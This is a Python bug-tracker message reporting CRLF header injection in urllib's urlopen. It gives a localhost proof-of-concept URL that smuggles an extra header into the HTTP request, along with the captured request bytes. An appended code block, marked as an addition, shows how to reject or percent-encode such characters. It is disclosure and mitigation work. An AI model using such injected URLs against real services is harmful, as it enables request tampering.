Author martin.panter
Recipients martin.panter, orange, serhiy.storchaka, xiang.zhang
Date 2017-06-03.07:01:33
Message-id <1496473293.92.0.424276419664.issue30458@psf.upfronthosting.co.za>
Content
You can also inject proper HTTP header fields (or do multiple requests) if you omit the space after the CRLF:

from urllib.request import urlopen
urlopen("http://localhost:8000/ HTTP/1.1\r\nHEADER: INJECTED\r\nIgnore:")

Data sent to the server:
>>> from pprint import pprint
>>> from socket import socket, AF_INET, SOCK_STREAM, IPPROTO_TCP
>>> server = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
>>> server.bind(("localhost", 8000))
>>> server.listen()
>>> [conn, addr] = server.accept()
>>> pprint(conn.recv(300).splitlines(keepends=True))
[b'GET / HTTP/1.1\r\n',
 b'HEADER: INJECTED\r\n',
 b'Ignore: HTTP/1.1\r\n',
 b'Accept-Encoding: identity\r\n',
 b'User-Agent: Python-urllib/3.5\r\n',
 b'Connection: close\r\n',
 b'Host: localhost:8000\r\n',
 b'\r\n']

Issue 14826 is already open about how “urlopen” handles spaces, and there is a patch in Issue 13359 that proposes to also encode newline characters. But if the CRLF or header injection is a security problem, then 2.7 etc. could be changed to raise an exception (like Issue 22928), or to do percent encoding.
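
Added example, not part of the original message and not CPython's code: the two mitigations named above (raise an exception, or percent-encode) applied to the URL from this message. The names UNSAFE, UnsafeURLError, reject_unsafe_url, encode_unsafe_url and naive_request_lines are hypothetical, and naive_request_lines is only a simplified model of a client that copies the URL path into the request line unchecked.

```python
import re

# C0 controls (including CR and LF), space and DEL must not appear raw in a URL.
UNSAFE = re.compile(r"[\x00-\x20\x7f]")

# The URL from the message above, reused as sample input.
SAMPLE = "http://localhost:8000/ HTTP/1.1\r\nHEADER: INJECTED\r\nIgnore:"


class UnsafeURLError(ValueError):
    """A URL carried a raw control character or space."""


def reject_unsafe_url(url):
    """Option 1: raise instead of sending the request."""
    match = UNSAFE.search(url)
    if match:
        raise UnsafeURLError("unsafe character %r at offset %d in URL"
                             % (match.group(), match.start()))
    return url


def encode_unsafe_url(url):
    """Option 2: percent-encode each offending character."""
    return UNSAFE.sub(lambda m: "%%%02X" % ord(m.group()), url)


def naive_request_lines(url):
    """Model of a client that pastes the URL path into the request line
    unchecked (hypothetical helper, not urllib's code)."""
    host, _, path = url.split("://", 1)[1].partition("/")
    head = "GET /%s HTTP/1.1\r\nHost: %s\r\n\r\n" % (path, host)
    return head.encode("latin-1").splitlines(keepends=True)


if __name__ == "__main__":
    print(len(naive_request_lines(SAMPLE)), "lines from the raw URL")
    safe = encode_unsafe_url(SAMPLE)
    print(safe)
    print(len(naive_request_lines(safe)), "lines after encoding")
    try:
        reject_unsafe_url(SAMPLE)
    except UnsafeURLError as exc:
        print("rejected:", exc)
```
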
History
Date                 User           Action  Args
2017-06-03 07:01:33  martin.panter  set     recipients: + martin.panter, serhiy.storchaka, xiang.zhang, orange
2017-06-03 07:01:33  martin.panter  set     messageid: <1496473293.92.0.424276419664.issue30458@psf.upfronthosting.co.za>
2017-06-03 07:01:33  martin.panter  link    issue30458 messages
2017-06-03 07:01:33  martin.panter  create